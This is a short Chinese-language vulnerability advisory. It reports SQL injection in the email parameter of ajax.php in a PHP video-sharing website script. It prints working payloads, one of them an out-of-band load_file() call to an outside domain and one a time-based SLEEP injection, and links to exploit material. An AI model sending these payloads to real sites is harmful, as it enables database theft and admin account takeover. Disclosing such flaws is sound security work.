供应商:https://www.sourcecodester.com/users/tips23
软件:https://www.sourcecodester.com/php/14584/video-sharing-website-using-phpmysqli-source-code.html
描述:
来自视频共享网站 1.0 的 `ajax.php` 应用程序的 `email` 参数 似乎容易受到 SQL 注入攻击。
有效载荷 ' (select load_file('\\dhy5y62urpxije56fiteqimmjdp6dy6mxplh87ww.nu11secur1ty.net\pkq')) ' 是在 email 参数中提交的。
此有效负载注入调用 MySQL 的 load_file 的 SQL 子查询 具有引用外部 URL 的 UNC 文件路径的函数 领域。
应用程序与该域交互,表明 执行了注入的 SQL 查询。攻击者可以采取管理员 此系统上的帐户控制。
代码语言:javascript复制```mysql
---
Parameter: email (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=jsmith@sample.com' (select
load_file('\\dhy5y62urpxije56fiteqimmjdp6dy6mxplh87ww.nu11secur1ty.net\pkq')) ''
AND (SELECT 8549 FROM (SELECT(SLEEP(5)))PJEk) AND
'yreq'='yreq&password=jsmith123
---
重现: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Video-Sharing-Website)
证明和利用: [href](https://streamable.com/4x2rfk)